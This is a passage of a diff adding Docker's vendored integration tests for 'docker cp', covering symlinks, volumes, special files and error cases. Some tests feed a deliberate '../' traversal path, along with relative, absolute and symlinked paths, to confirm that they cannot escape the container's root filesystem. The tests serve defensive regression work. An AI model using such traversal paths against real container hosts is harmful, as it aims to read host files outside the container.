cpTestName) + defer os.RemoveAll(tmpdir) + + path := path.Join("../../../../../../../../../../../../", cpFullPath) + + dockerCmd(c, "cp", containerID+":"+path, tmpdir) + + file, _ := os.Open(tmpname) + defer file.Close() + + test, err := ioutil.ReadAll(file) + c.Assert(err, checker.IsNil) + + // output matched host file -- garbage path can escape container rootfs + c.Assert(string(test), checker.Not(checker.Equals), cpHostContents) + + // output doesn't match the input for garbage path + c.Assert(string(test), checker.Equals, cpContainerContents) +} + +// Check that relative paths are relative to the container's rootfs +func (s *DockerSuite) TestCpRelativePath(c *check.C) { + out, _ := dockerCmd(c, "run", "-d", "busybox", "/bin/sh", "-c", "mkdir -p '"+cpTestPath+"' && echo -n '"+cpContainerContents+"' > "+cpFullPath) + + containerID := strings.TrimSpace(out) + + out, _ = dockerCmd(c, "wait", containerID) + // failed to set up 
container + c.Assert(strings.TrimSpace(out), checker.Equals, "0") + + c.Assert(os.MkdirAll(cpTestPath, os.ModeDir), checker.IsNil) + + hostFile, err := os.Create(cpFullPath) + c.Assert(err, checker.IsNil) + defer hostFile.Close() + defer os.RemoveAll(cpTestPathParent) + + fmt.Fprintf(hostFile, "%s", cpHostContents) + + tmpdir, err := ioutil.TempDir("", "docker-integration") + c.Assert(err, checker.IsNil) + + tmpname := filepath.Join(tmpdir, cpTestName) + defer os.RemoveAll(tmpdir) + + var relPath string + if path.IsAbs(cpFullPath) { + // normally this is `filepath.Rel("/", cpFullPath)` but we cannot + // get this unix-path manipulation on windows with filepath. + relPath = cpFullPath[1:] + } + c.Assert(path.IsAbs(cpFullPath), checker.True, check.Commentf("path %s was assumed to be an absolute path", cpFullPath)) + + dockerCmd(c, "cp", containerID+":"+relPath, tmpdir) + + file, _ := os.Open(tmpname) + defer file.Close() + + test, err := ioutil.ReadAll(file) + c.Assert(err, checker.IsNil) + + // output matched host file -- relative path can escape container rootfs + c.Assert(string(test), checker.Not(checker.Equals), cpHostContents) + + // output doesn't match the input for relative path + c.Assert(string(test), checker.Equals, cpContainerContents) +} + +// Check that absolute paths are relative to the container's rootfs +func (s *DockerSuite) TestCpAbsolutePath(c *check.C) { + out, _ := dockerCmd(c, "run", "-d", "busybox", "/bin/sh", "-c", "mkdir -p '"+cpTestPath+"' && echo -n '"+cpContainerContents+"' > "+cpFullPath) + + containerID := strings.TrimSpace(out) + + out, _ = dockerCmd(c, "wait", containerID) + // failed to set up container + c.Assert(strings.TrimSpace(out), checker.Equals, "0") + + c.Assert(os.MkdirAll(cpTestPath, os.ModeDir), checker.IsNil) + + hostFile, err := os.Create(cpFullPath) + c.Assert(err, checker.IsNil) + defer hostFile.Close() + defer os.RemoveAll(cpTestPathParent) + + fmt.Fprintf(hostFile, "%s", cpHostContents) + + tmpdir, err := 
ioutil.TempDir("", "docker-integration") + c.Assert(err, checker.IsNil) + + tmpname := filepath.Join(tmpdir, cpTestName) + defer os.RemoveAll(tmpdir) + + path := cpFullPath + + dockerCmd(c, "cp", containerID+":"+path, tmpdir) + + file, _ := os.Open(tmpname) + defer file.Close() + + test, err := ioutil.ReadAll(file) + c.Assert(err, checker.IsNil) + + // output matched host file -- absolute path can escape container rootfs + c.Assert(string(test), checker.Not(checker.Equals), cpHostContents) + + // output doesn't match the input for absolute path + c.Assert(string(test), checker.Equals, cpContainerContents) +} + +// Test for #5619 +// Check that absolute symlinks are still relative to the container's rootfs +func (s *DockerSuite) TestCpAbsoluteSymlink(c *check.C) { + testRequires(c, DaemonIsLinux) + out, _ := dockerCmd(c, "run", "-d", "busybox", "/bin/sh", "-c", "mkdir -p '"+cpTestPath+"' && echo -n '"+cpContainerContents+"' > "+cpFullPath+" && ln -s "+cpFullPath+" container_path") + + containerID := strings.TrimSpace(out) + + out, _ = dockerCmd(c, "wait", containerID) + // failed to set up container + c.Assert(strings.TrimSpace(out), checker.Equals, "0") + + c.Assert(os.MkdirAll(cpTestPath, os.ModeDir), checker.IsNil) + + hostFile, err := os.Create(cpFullPath) + c.Assert(err, checker.IsNil) + defer hostFile.Close() + defer os.RemoveAll(cpTestPathParent) + + fmt.Fprintf(hostFile, "%s", cpHostContents) + + tmpdir, err := ioutil.TempDir("", "docker-integration") + c.Assert(err, checker.IsNil) + + tmpname := filepath.Join(tmpdir, "container_path") + defer os.RemoveAll(tmpdir) + + path := path.Join("/", "container_path") + + dockerCmd(c, "cp", containerID+":"+path, tmpdir) + + // We should have copied a symlink *NOT* the file itself! 
+ linkTarget, err := os.Readlink(tmpname) + c.Assert(err, checker.IsNil) + + c.Assert(linkTarget, checker.Equals, filepath.FromSlash(cpFullPath)) +} + +// Check that symlinks to a directory behave as expected when copying one from +// a container. +func (s *DockerSuite) TestCpFromSymlinkToDirectory(c *check.C) { + testRequires(c, DaemonIsLinux) + out, _ := dockerCmd(c, "run", "-d", "busybox", "/bin/sh", "-c", "mkdir -p '"+cpTestPath+"' && echo -n '"+cpContainerContents+"' > "+cpFullPath+" && ln -s "+cpTestPathParent+" /dir_link") + + containerID := strings.TrimSpace(out) + + out, _ = dockerCmd(c, "wait", containerID) + // failed to set up container + c.Assert(strings.TrimSpace(out), checker.Equals, "0") + + testDir, err := ioutil.TempDir("", "test-cp-from-symlink-to-dir-") + c.Assert(err, checker.IsNil) + defer os.RemoveAll(testDir) + + // This copy command should copy the symlink, not the target, into the + // temporary directory. + dockerCmd(c, "cp", containerID+":"+"/dir_link", testDir) + + expectedPath := filepath.Join(testDir, "dir_link") + linkTarget, err := os.Readlink(expectedPath) + c.Assert(err, checker.IsNil) + + c.Assert(linkTarget, checker.Equals, filepath.FromSlash(cpTestPathParent)) + + os.Remove(expectedPath) + + // This copy command should resolve the symlink (note the trailing + // separator), copying the target into the temporary directory. + dockerCmd(c, "cp", containerID+":"+"/dir_link/", testDir) + + // It *should not* have copied the directory using the target's name, but + // used the given name instead. + unexpectedPath := filepath.Join(testDir, cpTestPathParent) + stat, err := os.Lstat(unexpectedPath) + if err == nil { + out = fmt.Sprintf("target name was copied: %q - %q", stat.Mode(), stat.Name()) + } + c.Assert(err, checker.NotNil, check.Commentf(out)) + + // It *should* have copied the directory using the asked name "dir_link". 
+ stat, err = os.Lstat(expectedPath) + c.Assert(err, checker.IsNil, check.Commentf("unable to stat resource at %q", expectedPath)) + + c.Assert(stat.IsDir(), checker.True, check.Commentf("should have copied a directory but got %q instead", stat.Mode())) +} + +// Check that symlinks to a directory behave as expected when copying one to a +// container. +func (s *DockerSuite) TestCpToSymlinkToDirectory(c *check.C) { + testRequires(c, DaemonIsLinux) + testRequires(c, SameHostDaemon) // Requires local volume mount bind. + + testVol, err := ioutil.TempDir("", "test-cp-to-symlink-to-dir-") + c.Assert(err, checker.IsNil) + defer os.RemoveAll(testVol) + + // Create a test container with a local volume. We will test by copying + // to the volume path in the container which we can then verify locally. + out, _ := dockerCmd(c, "create", "-v", testVol+":/testVol", "busybox") + + containerID := strings.TrimSpace(out) + + // Create a temp directory to hold a test file nested in a directory. + testDir, err := ioutil.TempDir("", "test-cp-to-symlink-to-dir-") + c.Assert(err, checker.IsNil) + defer os.RemoveAll(testDir) + + // This file will be at "/testDir/some/path/test" and will be copied into + // the test volume later. + hostTestFilename := filepath.Join(testDir, cpFullPath) + c.Assert(os.MkdirAll(filepath.Dir(hostTestFilename), os.FileMode(0700)), checker.IsNil) + c.Assert(ioutil.WriteFile(hostTestFilename, []byte(cpHostContents), os.FileMode(0600)), checker.IsNil) + + // Now create another temp directory to hold a symlink to the + // "/testDir/some" directory. + linkDir, err := ioutil.TempDir("", "test-cp-to-symlink-to-dir-") + c.Assert(err, checker.IsNil) + defer os.RemoveAll(linkDir) + + // Then symlink "/linkDir/dir_link" to "/testdir/some". + linkTarget := filepath.Join(testDir, cpTestPathParent) + localLink := filepath.Join(linkDir, "dir_link") + c.Assert(os.Symlink(linkTarget, localLink), checker.IsNil) + + // Now copy that symlink into the test volume in the container. 
+ dockerCmd(c, "cp", localLink, containerID+":/testVol") + + // This copy command should have copied the symlink *not* the target. + expectedPath := filepath.Join(testVol, "dir_link") + actualLinkTarget, err := os.Readlink(expectedPath) + c.Assert(err, checker.IsNil, check.Commentf("unable to read symlink at %q", expectedPath)) + + c.Assert(actualLinkTarget, checker.Equals, linkTarget) + + // Good, now remove that copied link for the next test. + os.Remove(expectedPath) + + // This copy command should resolve the symlink (note the trailing + // separator), copying the target into the test volume directory in the + // container. + dockerCmd(c, "cp", localLink+"/", containerID+":/testVol") + + // It *should not* have copied the directory using the target's name, but + // used the given name instead. + unexpectedPath := filepath.Join(testVol, cpTestPathParent) + stat, err := os.Lstat(unexpectedPath) + if err == nil { + out = fmt.Sprintf("target name was copied: %q - %q", stat.Mode(), stat.Name()) + } + c.Assert(err, checker.NotNil, check.Commentf(out)) + + // It *should* have copied the directory using the asked name "dir_link". 
+ stat, err = os.Lstat(expectedPath) + c.Assert(err, checker.IsNil, check.Commentf("unable to stat resource at %q", expectedPath)) + + c.Assert(stat.IsDir(), checker.True, check.Commentf("should have copied a directory but got %q instead", stat.Mode())) + + // And this directory should contain the file copied from the host at the + // expected location: "/testVol/dir_link/path/test" + expectedFilepath := filepath.Join(testVol, "dir_link/path/test") + fileContents, err := ioutil.ReadFile(expectedFilepath) + c.Assert(err, checker.IsNil) + + c.Assert(string(fileContents), checker.Equals, cpHostContents) +} + +// Test for #5619 +// Check that symlinks which are part of the resource path are still relative to the container's rootfs +func (s *DockerSuite) TestCpSymlinkComponent(c *check.C) { + testRequires(c, DaemonIsLinux) + out, _ := dockerCmd(c, "run", "-d", "busybox", "/bin/sh", "-c", "mkdir -p '"+cpTestPath+"' && echo -n '"+cpContainerContents+"' > "+cpFullPath+" && ln -s "+cpTestPath+" container_path") + + containerID := strings.TrimSpace(out) + + out, _ = dockerCmd(c, "wait", containerID) + // failed to set up container + c.Assert(strings.TrimSpace(out), checker.Equals, "0") + + c.Assert(os.MkdirAll(cpTestPath, os.ModeDir), checker.IsNil) + + hostFile, err := os.Create(cpFullPath) + c.Assert(err, checker.IsNil) + defer hostFile.Close() + defer os.RemoveAll(cpTestPathParent) + + fmt.Fprintf(hostFile, "%s", cpHostContents) + + tmpdir, err := ioutil.TempDir("", "docker-integration") + + c.Assert(err, checker.IsNil) + + tmpname := filepath.Join(tmpdir, cpTestName) + defer os.RemoveAll(tmpdir) + + path := path.Join("/", "container_path", cpTestName) + + dockerCmd(c, "cp", containerID+":"+path, tmpdir) + + file, _ := os.Open(tmpname) + defer file.Close() + + test, err := ioutil.ReadAll(file) + c.Assert(err, checker.IsNil) + + // output matched host file -- symlink path component can escape container rootfs + c.Assert(string(test), checker.Not(checker.Equals), 
cpHostContents) + + // output doesn't match the input for symlink path component + c.Assert(string(test), checker.Equals, cpContainerContents) +} + +// Check that cp with unprivileged user doesn't return any error +func (s *DockerSuite) TestCpUnprivilegedUser(c *check.C) { + testRequires(c, DaemonIsLinux) + testRequires(c, UnixCli) // uses chmod/su: not available on windows + + out, _ := dockerCmd(c, "run", "-d", "busybox", "/bin/sh", "-c", "touch "+cpTestName) + + containerID := strings.TrimSpace(out) + + out, _ = dockerCmd(c, "wait", containerID) + // failed to set up container + c.Assert(strings.TrimSpace(out), checker.Equals, "0") + + tmpdir, err := ioutil.TempDir("", "docker-integration") + c.Assert(err, checker.IsNil) + + defer os.RemoveAll(tmpdir) + + c.Assert(os.Chmod(tmpdir, 0777), checker.IsNil) + + result := icmd.RunCommand("su", "unprivilegeduser", "-c", + fmt.Sprintf("%s cp %s:%s %s", dockerBinary, containerID, cpTestName, tmpdir)) + result.Assert(c, icmd.Expected{}) +} + +func (s *DockerSuite) TestCpSpecialFiles(c *check.C) { + testRequires(c, DaemonIsLinux) + testRequires(c, SameHostDaemon) + + outDir, err := ioutil.TempDir("", "cp-test-special-files") + c.Assert(err, checker.IsNil) + defer os.RemoveAll(outDir) + + out, _ := dockerCmd(c, "run", "-d", "busybox", "/bin/sh", "-c", "touch /foo") + + containerID := strings.TrimSpace(out) + + out, _ = dockerCmd(c, "wait", containerID) + // failed to set up container + c.Assert(strings.TrimSpace(out), checker.Equals, "0") + + // Copy actual /etc/resolv.conf + dockerCmd(c, "cp", containerID+":/etc/resolv.conf", outDir) + + expected, err := readContainerFile(containerID, "resolv.conf") + actual, err := ioutil.ReadFile(outDir + "/resolv.conf") + + // Expected copied file to be duplicate of the container resolvconf + c.Assert(bytes.Equal(actual, expected), checker.True) + + // Copy actual /etc/hosts + dockerCmd(c, "cp", containerID+":/etc/hosts", outDir) + + expected, err = readContainerFile(containerID, 
"hosts") + actual, err = ioutil.ReadFile(outDir + "/hosts") + + // Expected copied file to be duplicate of the container hosts + c.Assert(bytes.Equal(actual, expected), checker.True) + + // Copy actual /etc/resolv.conf + dockerCmd(c, "cp", containerID+":/etc/hostname", outDir) + + expected, err = readContainerFile(containerID, "hostname") + actual, err = ioutil.ReadFile(outDir + "/hostname") + + // Expected copied file to be duplicate of the container resolvconf + c.Assert(bytes.Equal(actual, expected), checker.True) +} + +func (s *DockerSuite) TestCpVolumePath(c *check.C) { + // stat /tmp/cp-test-volumepath851508420/test gets permission denied for the user + testRequires(c, NotUserNamespace) + testRequires(c, DaemonIsLinux) + testRequires(c, SameHostDaemon) + + tmpDir, err := ioutil.TempDir("", "cp-test-volumepath") + c.Assert(err, checker.IsNil) + defer os.RemoveAll(tmpDir) + outDir, err := ioutil.TempDir("", "cp-test-volumepath-out") + c.Assert(err, checker.IsNil) + defer os.RemoveAll(outDir) + _, err = os.Create(tmpDir + "/test") + c.Assert(err, checker.IsNil) + + out, _ := dockerCmd(c, "run", "-d", "-v", "/foo", "-v", tmpDir+"/test:/test", "-v", tmpDir+":/baz", "busybox", "/bin/sh", "-c", "touch /foo/bar") + + containerID := strings.TrimSpace(out) + + out, _ = dockerCmd(c, "wait", containerID) + // failed to set up container + c.Assert(strings.TrimSpace(out), checker.Equals, "0") + + // Copy actual volume path + dockerCmd(c, "cp", containerID+":/foo", outDir) + + stat, err := os.Stat(outDir + "/foo") + c.Assert(err, checker.IsNil) + // expected copied content to be dir + c.Assert(stat.IsDir(), checker.True) + stat, err = os.Stat(outDir + "/foo/bar") + c.Assert(err, checker.IsNil) + // Expected file `bar` to be a file + c.Assert(stat.IsDir(), checker.False) + + // Copy file nested in volume + dockerCmd(c, "cp", containerID+":/foo/bar", outDir) + + stat, err = os.Stat(outDir + "/bar") + c.Assert(err, checker.IsNil) + // Expected file `bar` to be a file + 
c.Assert(stat.IsDir(), checker.False) + + // Copy Bind-mounted dir + dockerCmd(c, "cp", containerID+":/baz", outDir) + stat, err = os.Stat(outDir + "/baz") + c.Assert(err, checker.IsNil) + // Expected `baz` to be a dir + c.Assert(stat.IsDir(), checker.True) + + // Copy file nested in bind-mounted dir + dockerCmd(c, "cp", containerID+":/baz/test", outDir) + fb, err := ioutil.ReadFile(outDir + "/baz/test") + c.Assert(err, checker.IsNil) + fb2, err := ioutil.ReadFile(tmpDir + "/test") + c.Assert(err, checker.IsNil) + // Expected copied file to be duplicate of bind-mounted file + c.Assert(bytes.Equal(fb, fb2), checker.True) + + // Copy bind-mounted file + dockerCmd(c, "cp", containerID+":/test", outDir) + fb, err = ioutil.ReadFile(outDir + "/test") + c.Assert(err, checker.IsNil) + fb2, err = ioutil.ReadFile(tmpDir + "/test") + c.Assert(err, checker.IsNil) + // Expected copied file to be duplicate of bind-mounted file + c.Assert(bytes.Equal(fb, fb2), checker.True) +} + +func (s *DockerSuite) TestCpToDot(c *check.C) { + out, _ := dockerCmd(c, "run", "-d", "busybox", "/bin/sh", "-c", "echo lololol > /test") + + containerID := strings.TrimSpace(out) + + out, _ = dockerCmd(c, "wait", containerID) + // failed to set up container + c.Assert(strings.TrimSpace(out), checker.Equals, "0") + + tmpdir, err := ioutil.TempDir("", "docker-integration") + c.Assert(err, checker.IsNil) + defer os.RemoveAll(tmpdir) + cwd, err := os.Getwd() + c.Assert(err, checker.IsNil) + defer os.Chdir(cwd) + c.Assert(os.Chdir(tmpdir), checker.IsNil) + dockerCmd(c, "cp", containerID+":/test", ".") + content, err := ioutil.ReadFile("./test") + c.Assert(string(content), checker.Equals, "lololol\n") +} + +func (s *DockerSuite) TestCpToStdout(c *check.C) { + out, _ := dockerCmd(c, "run", "-d", "busybox", "/bin/sh", "-c", "echo lololol > /test") + + containerID := strings.TrimSpace(out) + + out, _ = dockerCmd(c, "wait", containerID) + // failed to set up container + c.Assert(strings.TrimSpace(out), 
checker.Equals, "0") + + out, _, err := runCommandPipelineWithOutput( + exec.Command(dockerBinary, "cp", containerID+":/test", "-"), + exec.Command("tar", "-vtf", "-")) + + c.Assert(err, checker.IsNil) + + c.Assert(out, checker.Contains, "test") + c.Assert(out, checker.Contains, "-rw") +} + +func (s *DockerSuite) TestCpNameHasColon(c *check.C) { + testRequires(c, SameHostDaemon, DaemonIsLinux) + + out, _ := dockerCmd(c, "run", "-d", "busybox", "/bin/sh", "-c", "echo lololol > /te:s:t") + + containerID := strings.TrimSpace(out) + + out, _ = dockerCmd(c, "wait", containerID) + // failed to set up container + c.Assert(strings.TrimSpace(out), checker.Equals, "0") + + tmpdir, err := ioutil.TempDir("", "docker-integration") + c.Assert(err, checker.IsNil) + defer os.RemoveAll(tmpdir) + dockerCmd(c, "cp", containerID+":/te:s:t", tmpdir) + content, err := ioutil.ReadFile(tmpdir + "/te:s:t") + c.Assert(string(content), checker.Equals, "lololol\n") +} + +func (s *DockerSuite) TestCopyAndRestart(c *check.C) { + testRequires(c, DaemonIsLinux) + expectedMsg := "hello" + out, _ := dockerCmd(c, "run", "-d", "busybox", "echo", expectedMsg) + containerID := strings.TrimSpace(out) + + out, _ = dockerCmd(c, "wait", containerID) + // failed to set up container + c.Assert(strings.TrimSpace(out), checker.Equals, "0") + + tmpDir, err := ioutil.TempDir("", "test-docker-restart-after-copy-") + c.Assert(err, checker.IsNil) + defer os.RemoveAll(tmpDir) + + dockerCmd(c, "cp", fmt.Sprintf("%s:/etc/group", containerID), tmpDir) + + out, _ = dockerCmd(c, "start", "-a", containerID) + + c.Assert(strings.TrimSpace(out), checker.Equals, expectedMsg) +} + +func (s *DockerSuite) TestCopyCreatedContainer(c *check.C) { + testRequires(c, DaemonIsLinux) + dockerCmd(c, "create", "--name", "test_cp", "-v", "/test", "busybox") + + tmpDir, err := ioutil.TempDir("", "test") + c.Assert(err, checker.IsNil) + defer os.RemoveAll(tmpDir) + dockerCmd(c, "cp", "test_cp:/bin/sh", tmpDir) +} + +// test copy with option 
`-L`: following symbol link +// Check that symlinks to a file behave as expected when copying one from +// a container to host following symbol link +func (s *DockerSuite) TestCpSymlinkFromConToHostFollowSymlink(c *check.C) { + testRequires(c, DaemonIsLinux) + out, exitCode := dockerCmd(c, "run", "-d", "busybox", "/bin/sh", "-c", "mkdir -p '"+cpTestPath+"' && echo -n '"+cpContainerContents+"' > "+cpFullPath+" && ln -s "+cpFullPath+" /dir_link") + if exitCode != 0 { + c.Fatal("failed to create a container", out) + } + + cleanedContainerID := strings.TrimSpace(out) + + out, _ = dockerCmd(c, "wait", cleanedContainerID) + if strings.TrimSpace(out) != "0" { + c.Fatal("failed to set up container", out) + } + + testDir, err := ioutil.TempDir("", "test-cp-symlink-container-to-host-follow-symlink") + if err != nil { + c.Fatal(err) + } + defer os.RemoveAll(testDir) + + // This copy command should copy the symlink, not the target, into the + // temporary directory. + dockerCmd(c, "cp", "-L", cleanedContainerID+":"+"/dir_link", testDir) + + expectedPath := filepath.Join(testDir, "dir_link") + + expected := []byte(cpContainerContents) + actual, err := ioutil.ReadFile(expectedPath) + + if !bytes.Equal(actual, expected) { + c.Fatalf("Expected copied file to be duplicate of the container symbol link target") + } + os.Remove(expectedPath) + + // now test copy symbol link to a non-existing file in host + expectedPath = filepath.Join(testDir, "somefile_host") + // expectedPath shouldn't exist, if exists, remove it + if _, err := os.Lstat(expectedPath); err == nil { + os.Remove(expectedPath) + } + + dockerCmd(c, "cp", "-L", cleanedContainerID+":"+"/dir_link", expectedPath) + + actual, err = ioutil.ReadFile(expectedPath) + + if !bytes.Equal(actual, expected) { + c.Fatalf("Expected copied file to be duplicate of the container symbol link target") + } + defer os.Remove(expectedPath) +} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_cp_to_container_test.go 
b/vendor/github.com/docker/docker/integration-cli/docker_cli_cp_to_container_test.go new file mode 100644 index 0000000000..f981cb8f8b --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_cp_to_container_test.go @@ -0,0 +1,599 @@ +package main + +import ( + "os" + + "github.com/docker/docker/pkg/integration/checker" + "github.com/go-check/check" +) + +// docker cp LOCALPATH CONTAINER:PATH + +// Try all of the test cases from the archive package which implements the +// internals of `docker cp` and ensure that the behavior matches when actually +// copying to and from containers. + +// Basic assumptions about SRC and DST: +// 1. SRC must exist. +// 2. If SRC ends with a trailing separator, it must be a directory. +// 3. DST parent directory must exist. +// 4. If DST exists as a file, it must not end with a trailing separator. + +// First get these easy error cases out of the way. + +// Test for error when SRC does not exist. +func (s *DockerSuite) TestCpToErrSrcNotExists(c *check.C) { + containerID := makeTestContainer(c, testContainerOptions{}) + + tmpDir := getTestDir(c, "test-cp-to-err-src-not-exists") + defer os.RemoveAll(tmpDir) + + srcPath := cpPath(tmpDir, "file1") + dstPath := containerCpPath(containerID, "file1") + + err := runDockerCp(c, srcPath, dstPath) + c.Assert(err, checker.NotNil) + + c.Assert(isCpNotExist(err), checker.True, check.Commentf("expected IsNotExist error, but got %T: %s", err, err)) +} + +// Test for error when SRC ends in a trailing +// path separator but it exists as a file. 
+func (s *DockerSuite) TestCpToErrSrcNotDir(c *check.C) { + containerID := makeTestContainer(c, testContainerOptions{}) + + tmpDir := getTestDir(c, "test-cp-to-err-src-not-dir") + defer os.RemoveAll(tmpDir) + + makeTestContentInDir(c, tmpDir) + + srcPath := cpPathTrailingSep(tmpDir, "file1") + dstPath := containerCpPath(containerID, "testDir") + + err := runDockerCp(c, srcPath, dstPath) + c.Assert(err, checker.NotNil) + + c.Assert(isCpNotDir(err), checker.True, check.Commentf("expected IsNotDir error, but got %T: %s", err, err)) +} + +// Test for error when SRC is a valid file or directory, +// bu the DST parent directory does not exist. +func (s *DockerSuite) TestCpToErrDstParentNotExists(c *check.C) { + testRequires(c, DaemonIsLinux) + containerID := makeTestContainer(c, testContainerOptions{addContent: true}) + + tmpDir := getTestDir(c, "test-cp-to-err-dst-parent-not-exists") + defer os.RemoveAll(tmpDir) + + makeTestContentInDir(c, tmpDir) + + // Try with a file source. + srcPath := cpPath(tmpDir, "file1") + dstPath := containerCpPath(containerID, "/notExists", "file1") + + err := runDockerCp(c, srcPath, dstPath) + c.Assert(err, checker.NotNil) + + c.Assert(isCpNotExist(err), checker.True, check.Commentf("expected IsNotExist error, but got %T: %s", err, err)) + + // Try with a directory source. + srcPath = cpPath(tmpDir, "dir1") + + c.Assert(err, checker.NotNil) + + c.Assert(isCpNotExist(err), checker.True, check.Commentf("expected IsNotExist error, but got %T: %s", err, err)) +} + +// Test for error when DST ends in a trailing path separator but exists as a +// file. 
Also test that we cannot overwrite an existing directory with a +// non-directory and cannot overwrite an existing +func (s *DockerSuite) TestCpToErrDstNotDir(c *check.C) { + testRequires(c, DaemonIsLinux) + containerID := makeTestContainer(c, testContainerOptions{addContent: true}) + + tmpDir := getTestDir(c, "test-cp-to-err-dst-not-dir") + defer os.RemoveAll(tmpDir) + + makeTestContentInDir(c, tmpDir) + + // Try with a file source. + srcPath := cpPath(tmpDir, "dir1/file1-1") + dstPath := containerCpPathTrailingSep(containerID, "file1") + + // The client should encounter an error trying to stat the destination + // and then be unable to copy since the destination is asserted to be a + // directory but does not exist. + err := runDockerCp(c, srcPath, dstPath) + c.Assert(err, checker.NotNil) + + c.Assert(isCpDirNotExist(err), checker.True, check.Commentf("expected DirNotExist error, but got %T: %s", err, err)) + + // Try with a directory source. + srcPath = cpPath(tmpDir, "dir1") + + // The client should encounter an error trying to stat the destination and + // then decide to extract to the parent directory instead with a rebased + // name in the source archive, but this directory would overwrite the + // existing file with the same name. + err = runDockerCp(c, srcPath, dstPath) + c.Assert(err, checker.NotNil) + + c.Assert(isCannotOverwriteNonDirWithDir(err), checker.True, check.Commentf("expected CannotOverwriteNonDirWithDir error, but got %T: %s", err, err)) +} + +// Check that copying from a local path to a symlink in a container copies to +// the symlink target and does not overwrite the container symlink itself. +func (s *DockerSuite) TestCpToSymlinkDestination(c *check.C) { + // stat /tmp/test-cp-to-symlink-destination-262430901/vol3 gets permission denied for the user + testRequires(c, NotUserNamespace) + testRequires(c, DaemonIsLinux) + testRequires(c, SameHostDaemon) // Requires local volume mount bind. 
+ + testVol := getTestDir(c, "test-cp-to-symlink-destination-") + defer os.RemoveAll(testVol) + + makeTestContentInDir(c, testVol) + + containerID := makeTestContainer(c, testContainerOptions{ + volumes: defaultVolumes(testVol), // Our bind mount is at /vol2 + }) + + // First, copy a local file to a symlink to a file in the container. This + // should overwrite the symlink target contents with the source contents. + srcPath := cpPath(testVol, "file2") + dstPath := containerCpPath(containerID, "/vol2/symlinkToFile1") + + c.Assert(runDockerCp(c, srcPath, dstPath), checker.IsNil) + + // The symlink should not have been modified. + c.Assert(symlinkTargetEquals(c, cpPath(testVol, "symlinkToFile1"), "file1"), checker.IsNil) + + // The file should have the contents of "file2" now. + c.Assert(fileContentEquals(c, cpPath(testVol, "file1"), "file2\n"), checker.IsNil) + + // Next, copy a local file to a symlink to a directory in the container. + // This should copy the file into the symlink target directory. + dstPath = containerCpPath(containerID, "/vol2/symlinkToDir1") + + c.Assert(runDockerCp(c, srcPath, dstPath), checker.IsNil) + + // The symlink should not have been modified. + c.Assert(symlinkTargetEquals(c, cpPath(testVol, "symlinkToDir1"), "dir1"), checker.IsNil) + + // The file should have the contents of "file2" now. + c.Assert(fileContentEquals(c, cpPath(testVol, "file2"), "file2\n"), checker.IsNil) + + // Next, copy a file to a symlink to a file that does not exist (a broken + // symlink) in the container. This should create the target file with the + // contents of the source file. + dstPath = containerCpPath(containerID, "/vol2/brokenSymlinkToFileX") + + c.Assert(runDockerCp(c, srcPath, dstPath), checker.IsNil) + + // The symlink should not have been modified. + c.Assert(symlinkTargetEquals(c, cpPath(testVol, "brokenSymlinkToFileX"), "fileX"), checker.IsNil) + + // The file should have the contents of "file2" now. 
+ c.Assert(fileContentEquals(c, cpPath(testVol, "fileX"), "file2\n"), checker.IsNil) + + // Next, copy a local directory to a symlink to a directory in the + // container. This should copy the directory into the symlink target + // directory and not modify the symlink. + srcPath = cpPath(testVol, "/dir2") + dstPath = containerCpPath(containerID, "/vol2/symlinkToDir1") + + c.Assert(runDockerCp(c, srcPath, dstPath), checker.IsNil) + + // The symlink should not have been modified. + c.Assert(symlinkTargetEquals(c, cpPath(testVol, "symlinkToDir1"), "dir1"), checker.IsNil) + + // The directory should now contain a copy of "dir2". + c.Assert(fileContentEquals(c, cpPath(testVol, "dir1/dir2/file2-1"), "file2-1\n"), checker.IsNil) + + // Next, copy a local directory to a symlink to a local directory that does + // not exist (a broken symlink) in the container. This should create the + // target as a directory with the contents of the source directory. It + // should not modify the symlink. + dstPath = containerCpPath(containerID, "/vol2/brokenSymlinkToDirX") + + c.Assert(runDockerCp(c, srcPath, dstPath), checker.IsNil) + + // The symlink should not have been modified. + c.Assert(symlinkTargetEquals(c, cpPath(testVol, "brokenSymlinkToDirX"), "dirX"), checker.IsNil) + + // The "dirX" directory should now be a copy of "dir2". 
+ c.Assert(fileContentEquals(c, cpPath(testVol, "dirX/file2-1"), "file2-1\n"), checker.IsNil) +} + +// Possibilities are reduced to the remaining 10 cases: +// +// case | srcIsDir | onlyDirContents | dstExists | dstIsDir | dstTrSep | action +// =================================================================================================== +// A | no | - | no | - | no | create file +// B | no | - | no | - | yes | error +// C | no | - | yes | no | - | overwrite file +// D | no | - | yes | yes | - | create file in dst dir +// E | yes | no | no | - | - | create dir, copy contents +// F | yes | no | yes | no | - | error +// G | yes | no | yes | yes | - | copy dir and contents +// H | yes | yes | no | - | - | create dir, copy contents +// I | yes | yes | yes | no | - | error +// J | yes | yes | yes | yes | - | copy dir contents +// + +// A. SRC specifies a file and DST (no trailing path separator) doesn't +// exist. This should create a file with the name DST and copy the +// contents of the source file into it. +func (s *DockerSuite) TestCpToCaseA(c *check.C) { + containerID := makeTestContainer(c, testContainerOptions{ + workDir: "/root", command: makeCatFileCommand("itWorks.txt"), + }) + + tmpDir := getTestDir(c, "test-cp-to-case-a") + defer os.RemoveAll(tmpDir) + + makeTestContentInDir(c, tmpDir) + + srcPath := cpPath(tmpDir, "file1") + dstPath := containerCpPath(containerID, "/root/itWorks.txt") + + c.Assert(runDockerCp(c, srcPath, dstPath), checker.IsNil) + + c.Assert(containerStartOutputEquals(c, containerID, "file1\n"), checker.IsNil) +} + +// B. SRC specifies a file and DST (with trailing path separator) doesn't +// exist. This should cause an error because the copy operation cannot +// create a directory when copying a single file. 
